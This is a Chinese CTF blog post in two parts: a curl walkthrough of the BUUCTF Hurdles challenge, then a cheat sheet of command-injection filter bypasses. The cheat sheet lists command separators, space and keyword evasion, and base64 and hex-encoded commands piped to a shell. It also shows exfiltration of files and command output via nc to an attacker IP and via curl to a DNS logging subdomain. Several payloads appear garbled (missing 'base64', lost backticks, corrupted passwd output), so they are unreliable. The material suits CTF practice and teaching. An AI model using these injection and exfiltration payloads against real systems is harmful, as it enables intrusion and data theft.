CTF中的curl命令

Posted 2023-04-04 XINO丶

//好久没发了（懒…）随便水一下

CURL命令解题（常用curl命令以及如何解题）

http://www.ruanyifeng.com/blog/2019/09/curl-reference.html
说的很详细，建议学习一下

注意点

windows系统用curl命令注意下引号包裹问题
注意下转义问题

BUUCTF [BSidesCF 2020] Hurdles

curl -X PUT http://node3.buuoj.cn:28174/hurdles

必须以!结尾

curl -X PUT http://node3.buuoj.cn:28174/hurdles/!

查询字符串要存在get=flag

 curl -X PUT 'http://node3.buuoj.cn:28174/hurdles/!?get=flag'

需要将请求链接以‘单引号包裹，访问后得到结果
需要传参的名为&=&=&，首先将其进行url编码，得到：%26%3D%26%3D%26，构造传参：

curl -X PUT 'http://node3.buuoj.cn:28174/hurdles/!?get=flag&%26%3D%26%3D%26=1'

需要将&=&=&的值等于%00（换行符），其后还包含了一个换行符，也是进行URL编码：%2500%0a，构造传参：

curl -X PUT 'http://node3.buuoj.cn:28174/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a'

需要指定认证，知道了用户名为player，但不知道密码，先随便猜测一个密码，使用-u参数指定：

curl -X PUT 'http://node3.buuoj.cn:28174/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a' -u 'player:player'

提示密码为字符串open sesame的十六进制MD5值：54ef36ec71201fdf9d1423fd26f97f6b，构造传参

curl -X PUT 'http://node3.buuoj.cn:28174/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a' -u 'player:54ef36ec71201fdf9d1423fd26f97f6b'

需要使用1377 Browser浏览器，使用-A参数设置

curl -X PUT 'http://node3.buuoj.cn:28174/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a' -u 'player:54ef36ec71201fdf9d1423fd26f97f6b' -A '1337 Browser'

需要浏览器版本为v.9000，构造传参：

curl -X PUT 'http://node3.buuoj.cn:28174/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a' -u 'player:54ef36ec71201fdf9d1423fd26f97f6b' -A '1337 Browser v.9000'

期待有人将这个转发给我，提示给出了Forwarded-For，猜测为修改X-Forwared-For为127.0.0.1，使用-H参数添加HTTP请求头X-Forwarded-For:127.0.0.1：
需要使用代理，需要额外的代理转发，尝试使用1.1.1.1，构造传参：

curl -X PUT 'http://node3.buuoj.cn:28174/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a' -u 'player:54ef36ec71201fdf9d1423fd26f97f6b' -A '1337 Browser v.9000' -H 'X-Forwarded-For:1.1.1.1,127.0.0.1' 

需要通过13.37.13.37这个地址代理，将1.1.1.1替换
需要Cookie，猜测参数名为Fortune，使用参数-b：

curl -X PUT 'http://node3.buuoj.cn:28174/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a' -u 'player:54ef36ec71201fdf9d1423fd26f97f6b' -A '1337 Browser v.9000' -H 'X-Forwarded-For:13.37.13.37,127.0.0.1' -b 'Fortune=1'

需要Cookie中包含2011年的RFC编号，通过查阅资料
https://datatracker.ietf.org/doc/rfc6265/

curl -X PUT 'http://node3.buuoj.cn:29486/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a' -u 'player:54ef36ec71201fdf9d1423fd26f97f6b' -A '1337 Browser v.9000' -H 'X-Forwarded-For:13.37.13.37,127.0.0.1' -b 'Fortune=6265'

只接受纯文本（MIME）形式的请求，依然通过-H参数添加请求头信息Accept:text/plain，构造传参
猜测其应该说的是Accept-Language请求头属性，查阅资料：语言代码缩写表大全（用于Accept-Language）

得到俄语的表示为ru，构造传参：

curl -X PUT 'http://node3.buuoj.cn:29486/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a' -u 'player:54ef36ec71201fdf9d1423fd26f97f6b' -A '1337 Browser v.9000' -H 'X-Forwarded-For:13.37.13.37,127.0.0.1' -b 'Fortune=6265' -H 'Accept:text/plain' -H 'Accept-Language:ru;'

需要使请求来自https://ctf.bsidessf.net，尝试添加了请求头Referer属性，但始终未能成功进入下一个，发现是origin:https://ctf.bsidessf.net，构造传参：

curl -X PUT 'http://node3.buuoj.cn:29486/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a' -u 'player:54ef36ec71201fdf9d1423fd26f97f6b' -A '1337 Browser v.9000' -H 'X-Forwarded-For:13.37.13.37,127.0.0.1' -b 'Fortune=6265' -H 'Accept:text/plain' -H 'Accept-Language:ru;' -H 'origin:https://ctf.bsidessf.net'

这次才是Referer属性，添加请求头Referer:https://ctf.bsidessf.net/challenges，构造传参：

curl -X PUT 'http://node3.buuoj.cn:29486/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a' -u 'player:54ef36ec71201fdf9d1423fd26f97f6b' -A '1337 Browser v.9000' -H 'X-Forwarded-For:13.37.13.37,127.0.0.1' -b 'Fortune=6265' -H 'Accept:text/plain' -H 'Accept-Language:ru;' -H 'origin:https://ctf.bsidessf.net' -H 'Referer:https://ctf.bsidessf.net/challenges'

但是没回显flag，猜测可能在返回的头信息中，添加-i参数 ：选项仅查看响应头部信息:

curl -i -X PUT 'http://node3.buuoj.cn:29486/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a' -u 'player:54ef36ec71201fdf9d1423fd26f97f6b' -A '1337 Browser v.9000' -H 'X-Forwarded-For:13.37.13.37,127.0.0.1' -b 'Fortune=6265' -H 'Accept:text/plain' -H 'Accept-Language:ru;' -H 'origin:https://ctf.bsidessf.net' -H 'Referer:https://ctf.bsidessf.net/challenges'

简简单单一题目，大家可以通过这题了解下curl命令，挺好用的

CTF中的命令执行绕过方式

CTF中的命令执行绕过方式

CTF中的命令执行绕过方式

0x01：管道符

在用linux命令时候,我们可以一行执行多条命令或者有条件的执行下一条命令，下面我们讲解一下linux命令分号&&和&，|和||的用法。

“;”分号用法

方式：command1 ; command2

用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行， 彼此之间不关心是否失败， 所有命令都会执行。

“| ”管道符用法

上一条命令的输出，作为下一条命令参数。ctf里面：ping 127.0.0.1 | ls(只执行ls不执行前面的）

方式：command1 | command

Linux所提供的管道符“|”将两个命令隔开，管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着第一个命令的输出会作为 第二个命令的输入，第二个命令的输出又会作为第三个命令的输入，依此类推。

利用一个管道：

# rpm -qa|grep licq

这条命令使用一个管道符“|”建立了一个管道。管道将rpm -qa命令的输出（包括系统中所有安装的RPM包）作为grep命令的输入，从而列出带有licq字符的RPM包来。

利用多个管道：

# cat /etc/passwd | grep /bin/bash | wc -l

这条命令使用了两个管道，利用第一个管道将cat命令（显示passwd文件的内容）的输出送给grep命令，grep命令找出含有“/bin /bash”的所有行；第二个管道将grep的输出送给wc命令，wc命令统计出输入中的行数。这个命令的功能在于找出系统中有多少个用户使用bash。

“&”符号用法 ctf中用法 ping 127.0.0.1 & ls(先执行ls后执行ping)

&放在启动参数后面表示设置此进程为后台进程

方式：command1 &

默认情况下，进程是前台进程，这时就把Shell给占据了，我们无法进行其他操作，对于那些没有交互的进程，很多时候，我们希望将其在后台启动，可以在启动参数的时候加一个\'&\'实现这个目的。

“&&”符号用法 ctf中用法 ping 127.0.0.1 && ls（ping命令正确才执行ls 要是ping 1 && ls ls就不会执行)

shell 在执行某个命令的时候，会返回一个返回值，该返回值保存在 shell 变量 $? 中。当 $? == 0 时，表示执行成功；当 $? == 1 时（我认为是非0的数，返回值在0-255间），表示执行失败。

有时候，下一条命令依赖前一条命令是否执行成功。如：在成功地执行一条命令之后再执行另一条命令，或者在一条命令执行失败后再执行另一条命令等。shell 提供了 && 和 || 来实现命令执行控制的功能，shell 将根据 && 或 || 前面命令的返回值来控制其后面命令的执行。

语法格式如下：

command1 && command2 [&& command3 ...]

命令之间使用 && 连接，实现逻辑与的功能。

只有在 && 左边的命令返回真（命令返回值 $? == 0），&& 右边的命令才会被执行。

只要有一个命令返回假（命令返回值 $? == 1），后面的命令就不会被执行。

“||”符号用法和&&相反 左边为假才执行命令二

逻辑或的功能

语法格式如下：

command1 || command2 [|| command3 ...]

命令之间使用 || 连接，实现逻辑或的功能。

只有在 || 左边的命令返回假（命令返回值 $? == 1），|| 右边的命令才会被执行。这和 c 语言中的逻辑或语法功能相同，即实现短路逻辑或操作。

只要有一个命令返回真（命令返回值 $? == 0），后面的命令就不会被执行。–直到返回真的地方停止执行。

举例，ping命令判断存活主机

ping -c 1 -w 1 192.168.1.1 &> /dev/null && result=0 ||result=1

if [ "$result" == 0 ];then

echo "192.168.1.1 is UP!"

else

echo "192.168.2.1 is DOWN!"

fi

注意 &>要连起来写。

0x02：一些绕过方式

linux下绕过空格

{cat,flag.txt}

cat${IFS}flag.txt

cat$IFS$9flag.txt

cat<flag.txt

cat<>flag.txt

ca\\t fl\\ag

kg=$\'\\x20flag.txt\'&&cat$kg(\\x20转换成字符串就是空格，这里通过变量的方式巧妙绕过)

windows下绕过空格

（实用性不是很广，也就type这个命令可以用）

type.\\flag.txt

type,flag.txt

echo,123456

1：通配符绕过

？？？在linux里面可以进行代替字母

/???/c?t flag.txt

*在linux里面可以进行模糊匹配

cat flag.* *进行模糊匹配php

nc外带数据

本地监听端口

nc -lvp 9999

命令执行出 ping 127.0.0.0 & nc ip port > key.php

内联执行的做法：

payload：cat$IFS$1ls

使用内联执行会将 ``内的输出作为前面命令的输入，当我们输入上述payload时，等同于cat falg.php;cat index.php

利用DNS管道解析：

这里提供一个在线网址，可以直接进行给一个利用网址：admin.dnslog.link注册一个账号后会分配一个子域名可以利用。

|curl whoami.http://xxxx.xxx(子域名)

这样就会在利用网址看到反弹结果。（这里也不演示了，账号忘记了。。。）这里解释一下\\whoami\\因为`反引号在linux下是执行命令的特殊符号，原理请见：

http://mp.weixin.qq.com/s/jwqWnP0FHhMoR5b6iCS6NQ

网络地址转化为数字地址

网络地址有另外一种表示形式，就是数字地址比如127.0.0.1可以转化为2130706433

可以直接访问

http://2130706433

或者http://0x7F000001

这样就可以绕过.的ip过滤，这里给个转化网址：

http://www.msxindl.com/tools/ip/ip_num.asp

通过查看文件的权限 chmod +777赋予权限

l\'s\' -la

c\'h\'m\'o\'d +777 /filename

代替cat的命令

cat:由第一行开始显示内容，并将所有内容输出

tac:从最后一行倒序显示内容，并将所有内容输出

more:根据窗口大小，一页一页的现实文件内容

less:和more类似，但其优点可以往前翻页，而且进行可以搜索字符

head:只显示头几行

tail:只显示最后几行

nl:类似于cat -n，显示时输出行号

tailf:类似于tail -f

sort%20/flag 读文件

dir来查看当前目录文件

Linux花式读取文件内容

ps:目标是获取flag.txt的内容

static-sh读取文件：

static-sh ./flag.txt

#输出结果：

./flag.txt: line 1: flag{this_is_a_test}: not found

paste读取文件:

paste ./flag.txt /etc/passwd

#输出结果：

flag{this_is_a_test}

root❌0:0:root:/root:/bin/bash

daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin❌2:2:bin:/bin:/usr/sbin/nologin

sys❌3:3:sys:/dev:/usr/sbin/nologin

sync❌4:65534:sync:/bin:/bin/sync

diff读取文件 :

diff ./flag.txt /etc/passwd

#输出结果：

1c1,45<

flag{this_is_a_test}

\\ No newline at end of file

---

> root❌0:0:root:/root:/bin/bash

> daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin

> bin❌2:2:bin:/bin:/usr/sbin/nologin

> sys❌3:3:sys:/dev:/usr/sbin/nologin

> sync❌4:65534:sync:/bin:/bin/sync

od读取文件

od -a ./flag.txt

#输出结果：

0000000 f l a g { t h i s _ i s _ a _ t

0000020 e s t }

0000024

bzmore读取文件:

bzmore ./flag.txt

bzless读取文件：

bzless ./flag.txtecho bzless ./flag.txt

#输出结果：

------> ./flag.txt <------ flag{this_is_a_test}

curl读取文件：

curl file:///home/coffee/flag

nc 传输文件

靶机：

nc 10.10.10.10 4444 < /var/www/html/key.php

接受机：

nc -l 4444 > key.txt

wget操作进行目标读取

wget url -P path

一些命令分隔符

linux中：%0a 、%0d 、; 、& 、| 、&&、||

windows中：%0a、&、|、%1a（一个神奇的角色，作为.bat文件中的命令分隔符）

过滤了 bash可以用sh

echo$IFS$1Y2F0IGZsYWcucGhw|$IFS$1-d|sh

拼接flag 1;a=fl;b=ag.php;cat $a$b

其中有这么一条过滤方法，我们用上述方法无法绕过，但是我们只要改变一下顺序就可以：1;a=ag.php;b=fl;cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;a=ag.php;b=fl;cat$IFS$1$b$aelse if(preg_match("/.f.l.a.g.*/", $ip)){die("fxck your flag!");}

编码绕过：

echo YWJjZGU=| -d //打印出来abcde

echo Y2F0IGZhbGcucGhw| -d|bash //cat flag.php echo Y2F0IGZhbGcucGhw| -d|sh //cat flag.php

hex编码绕过：

echo 63617420666c61672e706870 | xxd -r -p|bash //cat flag.ph

unicode编码

$(printf “\\154\\163”) //ls

$(printf “\\x63\\x61\\x74\\x20\\x66\\x6c\\x61\\x67\\x2e\\x70\\x68\\x70”) //cat flag.php

对于关键字还可以用单引号和反斜杠绕过 比如 cat fl’\'ag cat fl\\ag

总结一下，payload1;a=ag.php;b=fl;cat$IFS$1$b$a和 cat$IFS$1ls

得到的flag查看源码。

0x03：总结

对于此类题目常考于大学招新赛、机关企业内部CTF比赛、渗透证书的考察点等等，难度不大，就是在于姿势的积累。